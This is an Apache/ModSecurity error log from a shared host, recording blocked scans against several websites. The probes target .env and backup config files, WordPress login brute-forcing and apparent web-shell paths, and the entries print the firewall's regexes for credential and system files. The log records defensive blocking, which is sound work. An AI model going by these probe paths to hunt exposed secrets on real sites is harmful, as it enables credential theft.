[Tue May 26 19:56:58.670141 2026] [security2:error] [pid 93576:tid 93785] [client 20.9.81.163:35982] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/ioxi-o.php"] [unique_id "ahWtsmDRMqfxdEDkoszgJwAAAEk"]
[Tue May 26 19:56:58.799081 2026] [security2:error] [pid 93868:tid 94384] [client 20.9.81.163:37204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/011i.php"] [unique_id "ahWtskqK9k_ZUB2Vp25giAAAAg0"]
[Tue May 26 19:56:58.799177 2026] [security2:error] [pid 93868:tid 94384] [client 20.9.81.163:37204] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/011i.php"] [unique_id "ahWtskqK9k_ZUB2Vp25giAAAAg0"]
[Tue May 26 19:56:59.222320 2026] [security2:error] [pid 93868:tid 94348] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backup/config.php.bak"] [unique_id "ahWts0qK9k_ZUB2Vp25glQAAAek"]
[Tue May 26 19:56:59.298686 2026] [security2:error] [pid 93868:tid 94275] [client 20.9.81.163:36047] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/edit.php"] [unique_id "ahWts0qK9k_ZUB2Vp25gmQAAAaA"]
[Tue May 26 19:56:59.298774 2026] [security2:error] [pid 93868:tid 94275] [client 20.9.81.163:36047] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/edit.php"] [unique_id "ahWts0qK9k_ZUB2Vp25gmQAAAaA"]
[Tue May 26 19:56:59.378585 2026] [security2:error] [pid 93576:tid 93684] [remote 217.112.89.35:45306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWts2DRMqfxdEDkoszgMgAAD2Y"]
[Tue May 26 19:56:59.553909 2026] [security2:error] [pid 93868:tid 94304] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sql/transaction.sql"] [unique_id "ahWts0qK9k_ZUB2Vp25gsAAAAb0"]
[Tue May 26 19:56:59.708883 2026] [security2:error] [pid 93868:tid 94266] [client 20.9.81.163:37289] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/sid3.php"] [unique_id "ahWts0qK9k_ZUB2Vp25gtwAAAZc"]
[Tue May 26 19:56:59.708986 2026] [security2:error] [pid 93868:tid 94266] [client 20.9.81.163:37289] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/sid3.php"] [unique_id "ahWts0qK9k_ZUB2Vp25gtwAAAZc"]
[Tue May 26 19:56:59.880382 2026] [security2:error] [pid 93868:tid 94269] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/bgoldd/.env"] [unique_id "ahWts0qK9k_ZUB2Vp25gvwAAAZo"]
[Tue May 26 19:56:59.914922 2026] [security2:error] [pid 93868:tid 94350] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWts0qK9k_ZUB2Vp25gqAAAAes"]
[Tue May 26 19:56:59.972674 2026] [security2:error] [pid 93576:tid 93771] [client 20.9.81.163:36044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/load.php"] [unique_id "ahWts2DRMqfxdEDkoszgPwAAADs"]
[Tue May 26 19:56:59.972790 2026] [security2:error] [pid 93576:tid 93771] [client 20.9.81.163:36044] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/load.php"] [unique_id "ahWts2DRMqfxdEDkoszgPwAAADs"]
[Tue May 26 19:57:00.206905 2026] [security2:error] [pid 93868:tid 94296] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/access/.env"] [unique_id "ahWttEqK9k_ZUB2Vp25gzQAAAbU"]
[Tue May 26 19:57:00.250931 2026] [security2:error] [pid 93868:tid 94314] [client 20.9.81.163:37262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/166.php"] [unique_id "ahWttEqK9k_ZUB2Vp25gzgAAAcc"]
[Tue May 26 19:57:00.251033 2026] [security2:error] [pid 93868:tid 94314] [client 20.9.81.163:37262] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/166.php"] [unique_id "ahWttEqK9k_ZUB2Vp25gzgAAAcc"]
[Tue May 26 19:57:00.369457 2026] [security2:error] [pid 93868:tid 94283] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/php/main.bak"] [unique_id "ahWttEqK9k_ZUB2Vp25g0gAAAag"]
[Tue May 26 19:57:00.527290 2026] [security2:error] [pid 93868:tid 94348] [client 20.9.81.163:36388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/load.php"] [unique_id "ahWttEqK9k_ZUB2Vp25g2gAAAek"]
[Tue May 26 19:57:00.527398 2026] [security2:error] [pid 93868:tid 94348] [client 20.9.81.163:36388] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/load.php"] [unique_id "ahWttEqK9k_ZUB2Vp25g2gAAAek"]
[Tue May 26 19:57:00.531442 2026] [security2:error] [pid 93868:tid 94369] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/eRp/.EnV"] [unique_id "ahWttEqK9k_ZUB2Vp25g2wAAAf4"]
[Tue May 26 19:57:00.732488 2026] [security2:error] [pid 93868:tid 94285] [client 172.86.66.156:61637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.66.86.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWttEqK9k_ZUB2Vp25g1QAAAao"], referer: https://www.cagmedya.com/
[Tue May 26 19:57:00.732606 2026] [security2:error] [pid 93868:tid 94285] [client 172.86.66.156:61637] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWttEqK9k_ZUB2Vp25g1QAAAao"], referer: https://www.cagmedya.com/
[Tue May 26 19:57:00.760898 2026] [security2:error] [pid 93868:tid 94300] [client 20.9.81.163:37191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/166.php"] [unique_id "ahWttEqK9k_ZUB2Vp25g4wAAAbk"]
[Tue May 26 19:57:00.760977 2026] [security2:error] [pid 93868:tid 94300] [client 20.9.81.163:37191] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/166.php"] [unique_id "ahWttEqK9k_ZUB2Vp25g4wAAAbk"]
[Tue May 26 19:57:00.858439 2026] [security2:error] [pid 93868:tid 94317] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/bootstrap/.env"] [unique_id "ahWttEqK9k_ZUB2Vp25g7QAAAco"]
[Tue May 26 19:57:00.884197 2026] [security2:error] [pid 93868:tid 94315] [client 20.9.81.163:36373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/wp-mail.php"] [unique_id "ahWttEqK9k_ZUB2Vp25g7wAAAcg"]
[Tue May 26 19:57:00.884326 2026] [security2:error] [pid 93868:tid 94315] [client 20.9.81.163:36373] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/wp-mail.php"] [unique_id "ahWttEqK9k_ZUB2Vp25g7wAAAcg"]
[Tue May 26 19:57:01.001049 2026] [security2:error] [pid 93868:tid 94101] [remote 103.11.102.106:46278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWttEqK9k_ZUB2Vp25g6QAB_Sk"]
[Tue May 26 19:57:01.129563 2026] [security2:error] [pid 93868:tid 94339] [client 20.9.81.163:36797] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/leaf.php"] [unique_id "ahWttUqK9k_ZUB2Vp25g_wAAAeA"]
[Tue May 26 19:57:01.129672 2026] [security2:error] [pid 93868:tid 94339] [client 20.9.81.163:36797] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/leaf.php"] [unique_id "ahWttUqK9k_ZUB2Vp25g_wAAAeA"]
[Tue May 26 19:57:01.182992 2026] [security2:error] [pid 93868:tid 94269] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/travel-app/.env"] [unique_id "ahWttUqK9k_ZUB2Vp25hAQAAAZo"]
[Tue May 26 19:57:01.843342 2026] [security2:error] [pid 93868:tid 94334] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWttUqK9k_ZUB2Vp25hCwAAAds"]
[Tue May 26 19:57:01.906055 2026] [security2:error] [pid 93868:tid 94369] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cron.php.old"] [unique_id "ahWttUqK9k_ZUB2Vp25hHwAAAf4"]
[Tue May 26 19:57:02.243159 2026] [security2:error] [pid 93868:tid 94385] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/etc/config.php"] [unique_id "ahWttkqK9k_ZUB2Vp25hMAAAAg4"]
[Tue May 26 19:57:02.303171 2026] [security2:error] [pid 93868:tid 94078] [remote 103.11.102.106:46278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWttkqK9k_ZUB2Vp25hMQAB2R0"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:57:02.398304 2026] [core:error] [pid 93868:tid 94379] [client 165.227.69.18:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:57:02.398322 2026] [core:error] [pid 93868:tid 94379] [client 165.227.69.18:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 19:57:02.579945 2026] [security2:error] [pid 93868:tid 94280] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.gitlab-ci/.env"] [unique_id "ahWttkqK9k_ZUB2Vp25hSAAAAaU"]
[Tue May 26 19:57:03.071730 2026] [security2:error] [pid 93868:tid 94267] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/static/wp-config.bak"] [unique_id "ahWtt0qK9k_ZUB2Vp25hXgAAAZg"]
[Tue May 26 19:57:03.561571 2026] [security2:error] [pid 93868:tid 94263] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/key.php.bak"] [unique_id "ahWtt0qK9k_ZUB2Vp25hbQAAAZQ"]
[Tue May 26 19:57:04.375118 2026] [security2:error] [pid 93868:tid 94384] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/v5/.env"] [unique_id "ahWtuEqK9k_ZUB2Vp25hjAAAAg0"]
[Tue May 26 19:57:04.701045 2026] [security2:error] [pid 93868:tid 94313] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/dev-env/.env"] [unique_id "ahWtuEqK9k_ZUB2Vp25hnAAAAcY"]
[Tue May 26 19:57:04.958787 2026] [security2:error] [pid 93576:tid 93732] [client 20.9.81.163:36089] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/grsiuk.php"] [unique_id "ahWtuGDRMqfxdEDkoszgpgAAABQ"]
[Tue May 26 19:57:04.958869 2026] [security2:error] [pid 93576:tid 93732] [client 20.9.81.163:36089] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/grsiuk.php"] [unique_id "ahWtuGDRMqfxdEDkoszgpgAAABQ"]
[Tue May 26 19:57:05.027388 2026] [security2:error] [pid 93868:tid 94292] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.sendgrid.backup"] [unique_id "ahWtuUqK9k_ZUB2Vp25hqwAAAbE"]
[Tue May 26 19:57:05.158070 2026] [security2:error] [pid 93868:tid 94321] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtuEqK9k_ZUB2Vp25hmwAAAc4"]
[Tue May 26 19:57:05.188945 2026] [security2:error] [pid 93868:tid 94259] [client 185.177.72.53:15850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/vendor/laravel/.env"] [unique_id "ahWtuUqK9k_ZUB2Vp25hsQAAAZA"]
[Tue May 26 19:57:05.440798 2026] [security2:error] [pid 93868:tid 94263] [client 20.9.81.163:36450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/8.php"] [unique_id "ahWtuUqK9k_ZUB2Vp25hvgAAAZQ"]
[Tue May 26 19:57:05.441070 2026] [security2:error] [pid 93868:tid 94263] [client 20.9.81.163:36450] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/8.php"] [unique_id "ahWtuUqK9k_ZUB2Vp25hvgAAAZQ"]
[Tue May 26 19:57:05.656090 2026] [security2:error] [pid 93868:tid 94360] [client 20.9.81.163:36369] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/fs.php"] [unique_id "ahWtuUqK9k_ZUB2Vp25hxwAAAfU"]
[Tue May 26 19:57:05.656213 2026] [security2:error] [pid 93868:tid 94360] [client 20.9.81.163:36369] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/fs.php"] [unique_id "ahWtuUqK9k_ZUB2Vp25hxwAAAfU"]
[Tue May 26 19:57:05.806831 2026] [security2:error] [pid 93576:tid 93762] [client 20.9.81.163:36758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/ws38.php"] [unique_id "ahWtuWDRMqfxdEDkoszgvAAAADI"]
[Tue May 26 19:57:05.806924 2026] [security2:error] [pid 93576:tid 93762] [client 20.9.81.163:36758] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/ws38.php"] [unique_id "ahWtuWDRMqfxdEDkoszgvAAAADI"]
